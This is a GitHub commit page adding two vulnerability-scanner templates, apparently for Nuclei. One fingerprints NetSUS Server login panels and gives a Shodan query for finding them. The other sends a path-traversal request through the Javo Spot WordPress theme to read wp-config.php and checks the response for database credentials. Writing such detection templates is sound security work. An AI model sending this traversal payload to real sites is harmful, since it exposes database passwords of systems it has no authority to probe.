Merge pull request #3676 from DhiyaneshGeek/master

NetSUS Server Login Panel , Javo Spot Premium Theme - Unauthenticated Directory Traversal
patch-1
Prince Chaddha 2022-02-08 02:08:30 +05:30 committed by GitHub
commit 56160908f0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 52 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: netsus-server-login
info:
name: NetSUS Server Login Panel
author: dhiyaneshDK
severity: info
metadata:
shodan-query: 'http.title:"NetSUS Server Login"'
tags: panel,netsus,login
requests:
- method: GET
path:
- '{{BaseURL}}/webadmin/'
matchers-condition: and
matchers:
- type: word
words:
- '<title>NetSUS Server Login</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: wp-spot-premium-lfi
info:
name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
author: dhiyaneshDk
severity: high
description: The remote WordPress Java Spot Premium Theme has the `wp-config` file remotely accessible and its content available for reading.
reference:
- https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
- https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
tags: wordpress,backup
requests:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200